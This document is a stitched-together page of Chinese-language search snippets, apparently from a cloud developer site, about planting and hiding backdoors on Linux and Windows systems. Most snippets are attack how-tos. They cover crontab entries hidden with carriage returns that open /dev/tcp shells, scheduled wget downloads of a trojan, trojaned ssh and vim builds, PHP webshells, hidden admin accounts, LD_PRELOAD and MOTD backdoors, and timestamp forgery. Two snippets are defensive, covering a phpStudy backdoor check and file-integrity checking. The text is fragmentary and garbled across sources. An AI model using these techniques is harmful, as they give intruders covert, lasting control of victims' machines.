crontab定时后门 crontab是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。...隐藏crontab命令 我们清除之前的cron, 使用如下命令隐藏你的后门 (crontab-l;printf"*/60 * * * * exec 9 /dev/tcp/127.0.0.1/8888...这个后门还是存在的,应该怎么看到呢? 使用 cat-A xxx 就可以看到隐藏的后门了。 ? 原理 原理就是cat一些比如 \r 回车符 \n 换行符 \f 换页符这些符号导致了隐藏。...这里用python制作一个隐藏的sh。 cmd_h = "echo 'You forgot to check `cat -A`!'...> oops" # 隐藏 cmd_v = "echo 'You see me!'"
如果你看了bash章节想起 bash -i 应该就不会再有这个疑问了 没错,我们可以使用 -i 参数依赖bash或者sh的/dev/tcp/ip/port 来进行反弹一个远程的python code shell...但是 sys.modules字典中的 __main__ 的路径是绝对路径,同时,还引入了一些其他模块的路径 默认情况下,我觉得没有哪个module可以直接作为shell进行反弹,所以这个参数更适合于我们隐藏...所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 ....没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件,简直不要太好,我们看看文件内容,好决定怎么留后门,截取一小部分 ? ?...在 /usr/lib/python3.5/plat-x86_64-linux-gnu/ 创建 STYLE.py ?
隐藏 隐藏的技巧很多,废话不多说直接开始。 一. attrib +s +h 创建系统隐藏文件: attrib +s +a +r +h attrib +s +h 文件名 ? 查看隐藏文件 ? 二....还可以用上面学的隐藏 include.php ? 免杀 隐藏了也不行兄 dei,D 盾一扫瞬间爆炸。 ? 把 index.php:shell.jpg hex 编码 <?...while(1){ file_put_contents('webshell.php','clear'); sleep(1); } 五. php.ini后门...> // 后门类型可自己修改。 ? 后门留好后,需要重启 web 服务。 方法1....这个后门在任何的 PHP 页面都可以用菜刀连接: ? 后记 可以说全面扩展开有的写了,条条大路通罗马通罗马,每个人都有自己的理解,文笔有限,就写到这里,可赞可喷。
0x01:前言 近日,phpStudy被公告疑似遭遇黑客攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,经网友确认phpStudy2016、phpStudy2018的部分版本有后门...通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中,至少有2个版本: ? ?...用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否是存在后门的版本,命令参考: findstr /m /s /c:"@eval" *.* ?...0x02:预防 phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。...5、中间件后门 将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。...github项目地址: https://github.com/VladRico/apache2_BackdoorMod 6、利用404页面隐藏后门 404页面主要用来提升用户体验,可用来隐藏后门文件。... SetHandler application/x-httpd-php 8、利用 php.ini 隐藏后门文件 php.ini 中可以指定在主文件执行前后自动解析的文件名称...,常用于页面公共头部和尾部,也可以用来隐藏php后门。
> iis后门 https://github.com/ygwlgGiao/iis-raid-backdoor 使用vs2019进行编译,functions.h可修改配置信息 functions.h #
环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...+conceal:启用文本隐藏功能,可以隐藏文本的部分内容。 +cryptv:启用文件加密功能,可以对文件进行加密和解密。 +cscope:启用 Cscope 功能,用于在代码中进行符号查找和跳转。
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...shell ,可以通过标准输入的方式执行 sudo echo '123456' | sudo -S cat /etc/passwd 可以考虑搞新建 空白文件名 文件 + alias 劫持的方法来隐藏新建文件...有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门 这个后门更偏向于一个概念性的后门,以趣味性为主吧
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...现在我们在这台服务器上远程连接其他服务器 ?...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...ssh的时候才会反弹shell(这个我表示不理解,好像情况也不是很统一,可能跟我给了服务器单核有关系) 其实里面还涉及了一些知识点,比如:算了,你们自己去尝试把命令解密开,自己看吧,没啥难的 0x04 后门隐藏...整的似乎挺好,但是怎么隐藏起来,并且能够让所有登录的人直接就中招呢???
剩下的参数可以查看下面这个文档 SSH config file syntax and how-tos for configuring the OpenSSH client LocalCommand 参数含义:当连接远程主机成功后
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这种利用方法巧妙在使用了windows中的 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实的计划任务,我们使用crontab -e 可以看到真实的计划任务如下: ?
Windows-10系统用户隐藏 新建隐藏用户 net user liuwx$ 123456 /add ? net localgroup administrators liuwx$ /add ?...可以看到我们创建了一个隐藏用户:liuwx ? 接着net user发现并没有显示liuwx这个用户! 查看隐藏用户 ? regedit打开注册表 ?...可以看到,在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names下有我们所有的用户名(包括隐藏用户)!...如何打开权限没有adminisrator的话,就添加一个并设置权限就ok 权限设置完毕后,关闭注册表重新打开即可看到隐藏用户
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着...whoami.elf 远程下载后门程序 wget "http://test.oss-cn-beijing.aliyuncs.com/2022/11/02/whoami.elf" -O /tmp/release-update.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...这样直接就可以看到我们修改的环境变量了,相信大家已经想到了,可以使用上一节 alias 后门的想法进行隐藏 在这之前,我们还是要先把查看环境变量的方式大概总结出来,这样呢,可以一次性隐匿一下: echo...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的 参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我...
试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。...本文将结合实际应用,介绍几种文件完整性验证方式,可以帮助你找出代码中所有隐藏的后门。...2、diff命令 在Linux中,我们经常使用diff来比较两个文本文件的差异。同样,我们可以通过一行命令快速找出两个项目文件的差异。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
对象存储
云直播
